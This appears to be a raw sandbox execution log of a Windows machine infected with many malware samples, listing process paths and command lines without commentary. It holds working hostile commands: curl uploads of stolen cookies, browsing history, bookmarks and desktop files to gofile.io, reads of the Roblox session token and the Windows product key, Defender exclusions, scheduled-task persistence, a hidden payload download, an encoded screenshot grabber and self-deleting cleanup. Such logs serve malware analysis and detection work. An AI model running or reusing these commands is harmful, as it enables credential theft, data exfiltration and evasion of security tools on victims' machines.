powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\noll.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\noll.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckhistory.txt" https://store4.gofile.io/uploadFile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\Desktop\New Text Document mod.exse\a\BWCStartMSI.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\BWCStartMSI.exe"
C:\Windows\system32\attrib.exe
attrib -r C:\Windows\System32\drivers\etc\hosts
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BWCStartMSI.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BWCStartMSI.exe
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckhistory.txt" https://store4.gofile.io/uploadFile
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\elshcmw0\elshcmw0.cmdline"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /q /i BWCInstaller.msi /norestart
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7502.tmp" "c:\Users\Admin\AppData\Local\Temp\elshcmw0\CSC31DB2BB7496F410EABB08B34CCA1F31B.TMP"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\VipToolMeta.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\VipToolMeta.exe"
C:\Windows\system32\attrib.exe
attrib +r C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckparsedcookies.txt" https://store4.gofile.io/uploadFile"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckparsedcookies.txt" https://store4.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Windows Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tree.com
tree /A /F
C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe
"C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\TrackYourSentOLSetup.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\TrackYourSentOLSetup.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /I "C:\Program Files (x86)\Common Files\Wise Installation Wizard\WISFE9FC5BE5BB6414388F43D74DDB259E8_1_2_0_147.MSI" WISE_SETUP_EXE_PATH="C:\Users\Admin\Desktop\New Text Document mod.exse\a\TrackYourSentOLSetup.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckbookmarks.txt" https://store4.gofile.io/uploadFile"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Windows Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe" /rl HIGHEST /f
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckbookmarks.txt" https://store4.gofile.io/uploadFile
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding A2F2E84C68F849DA022261FEA98F23E7 C
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\Desktop\4363463463464363463463463\Files\noll.exe" & rd /s /q "C:\ProgramData\AECAECFCAAEB" & exit
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding BA52B7C8813C1EA74300800309F5AC18
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Windows\Installer\MSI8290.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240813437 2 CustomActions!CustomActions.CustomActions.StartApp
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe
"C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe"
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Windows\Installer\MSI89A6.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240814562 8 CustomActions!CustomActions.CustomActions.InstallPing
C:\Users\Admin\AppData\Local\Temp\115839\RegAsm.exe
C:\Users\Admin\AppData\Local\Temp\115839\RegAsm.exe
C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe
"C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Desktop/BackupInitialize.xltm" https://store4.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin/Desktop/BackupInitialize.xltm" https://store4.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 9100"
C:\Windows\system32\getmac.exe
getmac
C:\Windows\system32\taskkill.exe
taskkill /F /PID 9100
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 9100"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 9100
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Desktop/BackupShow.dxf" https://store4.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin/Desktop/BackupShow.dxf" https://store4.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI19562\rar.exe a -r -hp"Logger1@12345" "C:\Users\Admin\AppData\Local\Temp\AddxZ.zip" *"
C:\Users\Admin\AppData\Local\Temp\_MEI19562\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI19562\rar.exe a -r -hp"Logger1@12345" "C:\Users\Admin\AppData\Local\Temp\AddxZ.zip" *
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\4363463463464363463463463\Files\freedom.exe'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'freedom.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Windows.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows.exe'
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\Desktop\4363463463464363463463463\Files\XClient.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\XClient.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/homboz/ucm1/releases/download/iu1/shost.exe/' -outfile shost.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\t.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\t.exe"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows" /tr "C:\Users\Admin\Windows.exe"
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\4363463463464363463463463\Files\XClient.exe'
C:\Users\Admin\Desktop\4363463463464363463463463\Files\jgesfyhjsefa.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\jgesfyhjsefa.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\XSploitLauncher.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\XSploitLauncher.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
C:\Users\Admin\AppData\Roaming\svchost.exe
"C:\Users\Admin\AppData\Roaming\svchost.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\LummaC2.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\LummaC2.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\s.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\s.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Wave.exe'
C:\Users\Admin\Desktop\4363463463464363463463463\Files\mtbkkesfthae.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\mtbkkesfthae.exe"
C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "NET framework" /sc ONLOGON /tr "C:\Users\Admin\Desktop\4363463463464363463463463\Files\jgesfyhjsefa.exe" /rl HIGHEST /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Wave.exe'
C:\Users\Admin\Desktop\4363463463464363463463463\Files\random.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\random.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy Posing Posing.cmd && Posing.cmd
C:\Users\Admin\Desktop\New Text Document mod.exse\a\Out2.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Out2.exe"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Wave" /tr "C:\Users\Admin\AppData\Roaming\Wave.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.bing.com/search?q=northern+hawk-owl&form=hpcapt&filters=HpDate%3a"20241214_0800"&pc=W000
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffe28146f8,0x7fffe2814708,0x7fffe2814718
C:\Users\Admin\Desktop\4363463463464363463463463\Files\svchost.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\svchost.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\hbfgjhhesfd.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\hbfgjhhesfd.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,7653106696447128769,8352414823124746287,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2128 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,7653106696447128769,8352414823124746287,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2116,7653106696447128769,8352414823124746287,131072 --lang=es --service-sandbox-type=utility --mojo-platform-channel-handle=2816 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,7653106696447128769,8352414823124746287,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,7653106696447128769,8352414823124746287,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
C:\Users\Admin\Desktop\New Text Document mod.exse\a\null.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\null.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,7653106696447128769,8352414823124746287,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5004 /prefetch:1
C:\Users\Admin\Desktop\New Text Document mod.exse\a\neptuno.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\neptuno.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\VmManagedSetup.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\VmManagedSetup.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\ssg.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\ssg.exe"
C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "Framework" /sc ONLOGON /tr "C:\Users\Admin\Desktop\4363463463464363463463463\Files\hbfgjhhesfd.exe" /rl HIGHEST /f
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,7653106696447128769,8352414823124746287,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5116 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe
"C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe"
C:\Users\Admin\AppData\Local\Temp\1986110042.exe
C:\Users\Admin\AppData\Local\Temp\1986110042.exe
C:\Users\Admin\Desktop\New Text Document mod.exse\a\Out2.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Out2.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\null.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\null.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\xx.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\xx.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\cx.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\cx.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\AsyncClient.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\AsyncClient.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\dropper.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\dropper.exe"
C:\Windows\system32\svchost.exe
"C:\Windows\system32\svchost.exe"
C:\Windows\system32\audiodg.exe
"C:\Windows\system32\audiodg.exe"
C:\Windows\system32\msiexec.exe
"C:\Windows\system32\msiexec.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\ctx.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\ctx.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\GOLD1234.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\GOLD1234.exe"
C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\vvv.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\vvv.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\GOLD1234.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\GOLD1234.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 6428 -ip 6428
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6428 -s 152
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa opssvc"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
